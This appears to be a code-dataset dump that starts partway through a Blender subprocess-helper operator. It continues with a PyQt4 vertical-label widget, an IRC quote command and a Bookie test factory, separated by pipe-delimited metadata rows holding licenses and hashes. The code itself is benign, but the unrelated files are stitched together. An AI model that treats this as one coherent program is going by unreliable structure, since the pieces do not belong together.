Iterate over lines, yielding b'' when nothings left
or when new data is not yet available.
"""
import os
from .pipe_non_blocking import (
pipe_non_blocking_set,
pipe_non_blocking_is_error_blocking,
PortableBlockingIOError,
)
fd = f.fileno()
pipe_non_blocking_set(fd)
blocks = []
while True:
try:
data = os.read(fd, chunk)
if not data:
# case where reading finishes with no trailing newline
yield b''.join(blocks)
blocks.clear()
except PortableBlockingIOError as ex:
if not pipe_non_blocking_is_error_blocking(ex):
raise ex
yield b''
continue
while True:
n = data.find(b'\n')
if n == -1:
break
yield b''.join(blocks) + data[:n + 1]
data = data[n + 1:]
blocks.clear()
blocks.append(data)
def _report_output(self):
stdout_line_iter, stderr_line_iter = self._buffer_iter
for line_iter, report_type in (
(stdout_line_iter, {'INFO'}),
(stderr_line_iter, {'WARNING'})
):
while True:
line = next(line_iter).rstrip() # rstrip all, to include \r on windows
if not line:
break
self.report(report_type, line.decode(encoding='utf-8', errors='surrogateescape'))
def _wm_enter(self, context):
wm = context.window_manager
window = context.window
self._timer = wm.event_timer_add(self.report_interval, window)
window.cursor_set('WAIT')
def _wm_exit(self, context):
wm = context.window_manager
window = context.window
wm.event_timer_remove(self._timer)
window.cursor_set('DEFAULT')
def process_pre(self):
pass
def process_post(self, returncode):
pass
def modal(self, context, event):
wm = context.window_manager
p = self._process
if event.type == 'ESC':
self.cancel(context)
self.report({'INFO'}, "Operation aborted by user")
return {'CANCELLED'}
elif event.type == 'TIMER':
if p.poll() is not None:
self._report_output()
self._wm_exit(context)
self.process_post(p.returncode)
return {'FINISHED'}
self._report_output()
return {'PASS_THROUGH'}
def execute(self, context):
import subprocess
import os
import copy
self.process_pre()
env = copy.deepcopy(os.environ)
env.update(self.environ)
try:
p = subprocess.Popen(
self.command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
)
except FileNotFoundError as ex:
# Command not found
self.report({'ERROR'}, str(ex))
return {'CANCELLED'}
self._process = p
self._buffer_iter = (
iter(self._non_blocking_readlines(p.stdout)),
iter(self._non_blocking_readlines(p.stderr)),
)
wm = context.window_manager
wm.modal_handler_add(self)
self._wm_enter(context)
return {'RUNNING_MODAL'}
def cancel(self, context):
self._wm_exit(context)
self._process.kill()
self.process_post(-1)
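# Illustrative usage sketch (not part of the original module; the operator and
# command names below are hypothetical):
#
#   class WM_OT_run_tool(SubprocessHelper, bpy.types.Operator):
#       bl_idname = "wm.run_tool"
#       bl_label = "Run Tool"
#       report_interval = 0.25
#       command = ("some_tool", "--flag")
#
#       def process_post(self, returncode):
#           print("tool finished with", returncode)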
| gpl-3.0 | -5,265,626,018,868,350,000 | 28.873016 | 97 | 0.553135 | false | 4.491647 | false | false | false |
tetra5/radiance | ui/widgets/verticallabel.py | 1 | 1370 | # -*- coding: utf-8 -*-
"""
Created on 28.01.2011
@author: vda
"""
from PyQt4 import QtCore, QtGui
class VerticalLabel(QtGui.QWidget):
def __init__(self, text, parent=None):
QtGui.QWidget.__init__(self, parent)
self.text = text
fm = QtGui.QApplication.fontMetrics()
self.width = fm.width(self.text)
self.height = fm.height()
# self.setMinimumSize(QtCore.QSize(100, 100))
# self.setMaximumSize(QtCore.QSize(100, 100))
# self.setGeometry(0, 0, 100, 100)
self.setMinimumSize(QtCore.QSize(self.width, self.height))
self.setMaximumSize(QtCore.QSize(self.width, self.height))
self.setGeometry(0, 0, self.width, self.height)
# self.update()
def paintEvent(self, event):
fm = QtGui.QApplication.fontMetrics()
painter = QtGui.QPainter()
painter.begin(self)
painter.setBrush(QtGui.QBrush(QtGui.QColor('#CCCCCC')))
painter.setPen(QtCore.Qt.NoPen)
painter.drawRect(0, 0, fm.height(), fm.width(self.text))
#painter.drawRect(0, 0, 100, 100)
painter.setPen(QtCore.Qt.black)
# painter.translate(20, 100)
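# Rotate the painter 90 degrees counter-clockwise so the text below is drawn
# vertically (bottom-to-top) within the widget.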
painter.rotate(-90)
painter.drawText(event.rect(), QtCore.Qt.AlignCenter, self.text)
painter.end()
| mit | 5,865,820,515,146,894,000 | 26.42 | 72 | 0.586861 | false | 3.586387 | false | false | false |
supermaik/selbot | Quote_Command.py | 1 | 1175 | from Quotes import Quote
from Command import Command
class Quote_Command(Command):
def __init__(self, config):
self.connection = config['connection']
self.event = config['event']
self.channel = config['channel']
pass
def resolve(self):
args = self.event.arguments[0].split()
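# args[0] is the command word itself; an optional args[1] names the quote source.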
# Don't let people skip last 10 (for voting!)
if not self.channel.quote_last_ten:
#Check if they asked for a source
if len(args) > 1:
try:
#Grab a random quote from given source
q = self.channel.quotes_list.random_quote(args[1])
except Exception:
#Invalid source name
q = Quote("your_boss", "Don't you think you should be getting back to work?")
else:
#Grab random quote from random source
q = self.channel.quotes_list.random_quote()
self.channel.last_quote = q
#Print the quote
self.respond(self.event.target, q)
pass
def respond(self, target, message):
self.connection.privmsg(target, message)
| unlicense | 5,750,818,820,420,012,000 | 34.606061 | 97 | 0.556596 | false | 4.450758 | false | false | false |
ojengwa/Bookie | bookie/tests/factory.py | 1 | 2651 | """Provide tools for generating objects for testing purposes."""
from datetime import datetime
from random import randint
import random
import string
from bookie.models import DBSession
from bookie.models import Bmark
from bookie.models import Tag
from bookie.models.applog import AppLog
from bookie.models.auth import User
from bookie.models.stats import (
StatBookmark,
USER_CT,
)
def random_int(max=1000):
"""Generate a random integer value
:param max: Maximum value to hit.
"""
return randint(0, max)
def random_string(length=None):
"""Generates a random string from urandom.
:param length: Specify the number of chars in the generated string.
"""
chars = string.ascii_uppercase + string.digits
str_length = length if length is not None else random_int()
return unicode(u''.join(random.choice(chars) for x in range(str_length)))
def random_url():
"""Generate a random url that is totally bogus."""
url = u"http://{0}.com".format(random_string())
return url
def make_applog(message=None, status=None):
"""Generate applog instances."""
if status is None:
status = random_int(max=3)
if message is None:
message = random_string(100)
alog = AppLog(**{
'user': random_string(10),
'component': random_string(10),
'status': status,
'message': message,
'payload': u'',
})
return alog
def make_tag(name=None):
if not name:
name = random_string(255)
return Tag(name)
def make_bookmark(user=None):
"""Generate a fake bookmark for testing use."""
bmark = Bmark(random_url(),
username=u"admin",
desc=random_string(),
ext=random_string(),
tags=u"bookmarks")
if user:
bmark.username = user.username
bmark.user = user
DBSession.add(bmark)
DBSession.flush()
return bmark
def make_user_bookmark_count(username, data, tstamp=None):
"""Generate a fake user bookmark count for testing use"""
if tstamp is None:
tstamp = datetime.utcnow()
bmark_count = StatBookmark(tstamp=tstamp,
attrib=USER_CT.format(username),
data=data)
DBSession.add(bmark_count)
DBSession.flush()
return [bmark_count.attrib, bmark_count.data, bmark_count.tstamp]
def make_user(username=None):
"""Generate a fake user to test against."""
user = User()
if not username:
username = random_string(10)
user.username = username
DBSession.add(user)
DBSession.flush()
return user
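# Illustrative usage in a test (values are hypothetical):
#   user = make_user(u'alice')
#   bmark = make_bookmark(user)  # bookmark owned by that user
#   count = make_user_bookmark_count(user.username, data=1)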
| agpl-3.0 | 812,322,954,075,319,000 | 23.775701 | 77 | 0.632214 | false | 3.875731 | false | false | false |